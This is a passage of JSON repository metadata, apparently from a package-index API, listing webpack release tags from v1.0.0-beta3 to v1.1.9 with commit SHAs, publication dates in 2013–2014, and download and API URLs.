"download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0